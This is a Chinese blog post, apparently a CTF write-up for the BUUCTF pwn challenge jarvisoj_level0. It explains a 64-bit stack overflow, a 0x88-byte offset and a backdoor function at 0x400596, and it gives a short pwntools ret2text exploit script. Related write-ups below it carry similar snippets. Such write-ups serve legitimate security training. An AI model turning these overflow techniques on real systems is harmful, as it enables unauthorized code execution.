[每日一PWN]BUUCTF jarvisoj_level0

最新推荐文章于 2024-07-05 00:08:58 发布

悸动战士cosmos

最新推荐文章于 2024-07-05 00:08:58 发布

阅读量182

点赞数

分类专栏：每日一PWN 文章标签： pwn

本文链接：https://blog.csdn.net/qq_55233040/article/details/128009481

版权

每日一PWN 专栏收录该内容

6 篇文章 2 订阅

订阅专栏

前言

前言

依旧是基础的ret2text

保护模式

在这里插入图片描述
64位小端序，NX保护。

溢出点

在这里插入图片描述
主函数里没有溢出点，那么就看看主函数return时调用的vul函数（名字就已经明示你是漏洞了）。

进来就是一个单纯的溢出漏洞，read函数读取了0x200个字节，而输入点buf距离rbp只有0x80字节。

偏移计算

由上图：输入点buf距离rbp只有0x80字节，而rbp寄存器自身占用8字节，所以最终的偏移为0x80+8=0x88

后门函数

后门函数就更直白了
在这里插入图片描述

攻击脚本

from pwn import *
p=remote("ip",port)
payload=b'a'*0x88+p64(0x0400596)
p.sendline(payload)
p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

悸动战士cosmos

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

BUUCTF jarvisoj_level0

m0_54262894的博客

10-27

302

先checksec，仅开启了NX保护运行一下放入ida中查看main函数没有什么关键信息，双击vulnerable_function() 在这里我们看到了漏洞 buf定义了80个字节，而我们可以输入更多的数据接着找找后门函数这道题很简单，已经把后门给我们展示出来了记住后门函数的地址0x400596 做完以上步骤我们就有思路了：覆盖buf 的80个字节因为是64位的文件，然后再加8个字节...

【BUUCTF - PWN】jarvisoj_level0

古月浪子的博客

04-05

685

checksec一下，栈溢出 IDA打开看看，很明显的溢出和后门函数，一道白给题 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) rl=lambda :io.rec...

参与评论您还未登录，请先登录后发表或查看评论

[buuctf]jarvisoj_level0

逆向萌新的博客

05-30

496

[buuctf]jarvisoj_level0

【BUUCTF-PWN】6-jarvisoj_level0

最新发布

燕麦葡萄干的博客

07-05

222

buf变量长度为128，但是read可以读入0x200长度的字符，存在栈溢出，需要覆盖的长度为0x80+8。vulnerable_function()函数。64位，开启了NX保护。

[BUUCTF]PWN8——jarvisoj_level0

mcmuyanga的博客

08-26

584

[BUUCTF]PWN8——jarvisoj_level0 题目网址：https://buuoj.cn/challenges#jarvisoj_level0 步骤：例行检查，64位，开启了NX保护 nc一下，看看程序的大概执行流程，回显Hello，world之后让我们输入用64位ida打开，shift+f12查看字符串，发现了 system 和 /bin/sh 双击跟进，ctrl+x找到调用 /bin/sh 的函数，找到了程序里的后门，shell_addr=0x400596 根据

buuctf之jarvisoj_level0

weixin_54452942的博客

03-28

1133

64位(system_addr+1)的奥秘

buuctf jarvisoj_level0

carol2358的博客

04-17

644

栈溢出，然后覆盖返回地址为system的地址。 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' ru=lambda x:io.recvuntil(x) rl=lambda :io.recvline() ...

[BUUCTF]PWN-jarvisoj_level4

红凳子的博客

04-07

530

[BUUCTF]PWN-jarvisoj_level4前言一、程序分析二、漏洞利用方法一：使用LibcSearcher寻找libc版本方法二：使用DynELF函数进行泄露前言在这篇文章中将学习到劫持read函数、使用LibcSearcher寻找libc版本和DynELF函数的使用提示：以下是本篇文章正文内容，下面案例可供参考一、程序分析从中可以看出，32位程序，i386架构，开启了NX保护。输入点在vulnerable_function里，read试图向长度0x88的地址空间写入0x10

日行一PWN jarvisoj_level0

m0_57221101的博客

05-14

199

还是来自于BUUCTF的机器，今天的很简单，就是单纯的考察了read函数的漏洞，以及对64位寄存器的理解开始首先还是经典查壳和内存保护，发现啥也没有，是很简单的机器。然后IDA反编译一下，由于是64位的软件所以需要IDA64 main函数首先可以看到主函数中知识调用了write函数，并输出了Hello， Worldn这么几个字到终端。之后调用了vulnerable_function函数因为反汇编并不会给出类似于write这种函数的定义，所以需要熟悉汇编的同学自行根据效果来

BUUCTF_jarvisoj_level1

qq_39869547的博客

02-06

988

和原题的差别在于，远程不回显栈地址。直接常规栈溢出即可 #!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * from LibcSearcher import * elf = ELF("./level1") shellcode = asm(shellcraft.sh()) io = remote("node3.buuoj.c...

BUUCTF-PWN-jarvisoj_level0

m0_64180167的博客

04-15

发现buf 占80字节加上64基地址的8字节我们就需要0x88个字节填充满。果然就是输出hello world 然后输入。这道题也是栈溢出但是有不同的函数。发现/bin/sh 漏洞代码。进去发现果然没有使用这个函数。放入ida64 查字符串。我们重新回到main函数。这样我们就可以栈溢出。我们可以开始写exp。

[BUUCTF-pwn]——jarvisoj_level0

Y_peak的博客

01-31

1887

[BUUCTF-pwn]——jarvisoj_level0 题目地址：https://buuoj.cn/challenges#jarvisoj_level0 题目：还是先下载下来在Linux上checksex一下，基本确实又是栈溢出了。 64位，所以我们用64位的IDA打开，没什么有用的信息，点开vulnerable_function函数发现栈溢出的read函数，前面为0意味着标准读入，后面的长度也可以。没毛病就是这个地方了。再翻翻其他函数，发现了我们想要的system函数。找到位置，和需要覆

[BUUCTF]PWN------jarvisoj_level0

BangSen1的博客

01-18

340

jarvisoj_level0 例行检查，64bit，开启NX保护。 nc一下，出现了Hello world,接着让我们输入，没有有用的信息。 ‘用IDA打开，看到了/bin/sh 双击跟进，Ctrl+x查看被什么调用，找到了后门，所以shell_addr=0x400596 查看主函数，寻找输入点。可以看到buf的大小是0x80，但它读取时只读了0x20，可以溢出，覆盖返回地址为后门地址既可 exp flag ...

CTF buuoj pwn-----第6题:jarvisoj_level0

bing_Max的博客

09-02

1065

CTF buuoj pwn-----第6题:ciscn_2019_n_1前言一、checksec 检测文件的保护机制二. 静态分析，IDA打开文件三. 编写EXP四. 运行EXP, 获取flag 前言记录一下pwn的过程, 新手学习日记, 流水线记录. 打开题目, 连接靶机，下载文件level0 一、checksec 检测文件的保护机制 bing@bing-virtual-machine:~/pwn$ checksec ./level0 [*] '/home/bing/pwn/level0'

BUUCTF-Pwn-jarvisoj_level0

餐桌上的猫

02-12

343

题目截图 panyload=b’b’*(0x80+8)+p64(0x400596)

jarvisoj_level1

08-28

- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...